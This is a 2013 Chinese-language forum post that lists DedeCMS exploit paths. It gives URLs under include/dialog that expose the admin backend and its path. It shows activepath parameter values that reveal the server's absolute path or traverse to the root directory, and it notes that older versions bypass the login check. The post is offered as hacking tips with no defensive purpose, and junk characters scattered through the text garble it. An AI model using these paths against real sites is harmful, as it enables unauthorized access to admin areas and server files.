1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理' v4 M m; o1 j* _+ m4 E
: V7 B2 _+ @+ l+ W9 y {' P员帐号,新版本的就直接转向了后台.% ~* A+ \* N7 M7 Q
# q- J. F" F* E A2.include/dialog/config.php会爆出后台管理路径6 i! u* n$ H& W0 ]1 u- B+ w3 ` c$ `
+ k" i3 o( a* Y+ S5 ?. f, C' G/ G
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
0 L* S$ R( {$ c6 c; t" k& x. ^( r" @. E& ^1 x% f/ ]
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
3 n0 y( m9 a0 g( L
& {4 n0 N. @/ T: E& b: \5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉7 v: d- J& V# w3 e! Q, I
2 F+ s6 C2 b( O* o% s% ]2 n到根目录去.不过这些版本的访问地址有些不同.
: x' x2 M, o$ R; B: A地址为require/dialog/select_soft.php?activepath=/././././././././
" C+ D. Y- X0 `* E# {8 E. y' t, g- N( p3 r1 F8 q% c8 z/ `+ n7 F. }! [1 Z
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..; N6 t% n( y9 E" ~: w$ m2 H: V4 ^
存在相同问题的文件还有
5 M+ b" [6 L( y8 W' minclude\dialog\select_images.php1 N# S! `9 t* W1 I. N% u
include\dialog\select_media.php
# |0 @) B( V, w& {include\dialog\select_templets.php; l/ q1 @6 ]3 t; T* [
|
发表于 2013-4-16 16:50:43
收藏
支持
反对